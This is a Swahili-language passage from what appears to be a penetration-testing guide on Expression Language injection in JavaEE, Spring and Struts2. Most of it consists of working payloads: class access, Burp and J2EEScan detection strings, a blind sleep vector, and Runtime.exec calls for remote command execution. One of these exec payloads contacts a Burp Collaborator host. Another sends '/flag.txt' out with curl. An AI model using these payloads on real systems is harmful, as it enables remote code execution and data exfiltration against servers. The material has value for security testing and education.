Expression Language (EL) ni muhimu katika JavaEE kwa kuunganisha safu ya uwasilishaji (mfano, kurasa za wavuti) na mantiki ya programu (mfano, beans zinazodhibitiwa), ikiruhusu mwingiliano wao. Inatumika hasa katika:
JavaServer Faces (JSF): Kwa kuunganisha vipengele vya UI na data/hatua za nyuma.
JavaServer Pages (JSP): Kwa ufikiaji wa data na usimamizi ndani ya kurasa za JSP.
Contexts and Dependency Injection for Java EE (CDI): Kwa kuwezesha mwingiliano wa safu ya wavuti na beans zinazodhibitiwa.
Muktadha wa Matumizi:
Spring Framework: Inatumika katika moduli mbalimbali kama Usalama na Data.
Matumizi ya Kawaida: Kupitia SpEL API na waendelezaji katika lugha zinazotegemea JVM kama Java, Kotlin, na Scala.
EL inapatikana katika teknolojia za JavaEE, mazingira huru, na inatambulika kupitia .jsp au .jsf file extensions, makosa ya stack, na maneno kama "Servlet" katika vichwa. Hata hivyo, sifa zake na matumizi ya wahusika fulani yanaweza kutegemea toleo.
Kulingana na toleo la EL baadhi ya sifa zinaweza kuwa Zimewashwa au Zimezimwa na kawaida wahusika fulani wanaweza kuwa hawaruhusiwi.
java -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:.MainEnter a String to evaluate:{5*5}[25]
Note how in the previous example the term {5*5} was evaluated.
#Basic string operations examples{"a".toString()}[a]{"dfd".replace("d","x")}[xfx]#Access to the String class{"".getClass()}[class java.lang.String]#Access ro the String class bypassing "getClass"#{""["class"]}#Access to arbitrary class{"".getClass().forName("java.util.Date")}[class java.util.Date]#List methods of a class{"".getClass().forName("java.util.Date").getMethods()[0].toString()}[public boolean java.util.Date.equals(java.lang.Object)]
Kugundua
Kugundua kwa Burp
gk6q${"zkz".toString().replace("k", "x")}doap2#The value returned was "igk6qzxzdoap2", indicating of the execution of the expression.
Ugunduzi wa J2EE
#J2EEScan Detection vector (substitute the content of the response body with the content of the "INJPARAM" parameter concatenated with a sum of integer):https://www.example.url/?vulnerableParameter=PRE-${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}-POST&INJPARAM=HOOK_VAL
Lala sekunde 10
#Blind detection vector (sleep during 10 seconds)https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
#Check the method getRuntime is there{"".getClass().forName("java.lang.Runtime").getMethods()[6].toString()}[public static java.lang.Runtime java.lang.Runtime.getRuntime()]#Execute command (you won't see the command output in the console){"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://127.0.0.1:8000")}[Process[pid=10892, exitValue=0]]#Execute command bypassing "getClass"#{""["class"].forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl <instance>.burpcollaborator.net")}# With HTMl entities injection inside the template<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}"th:title='pepito'>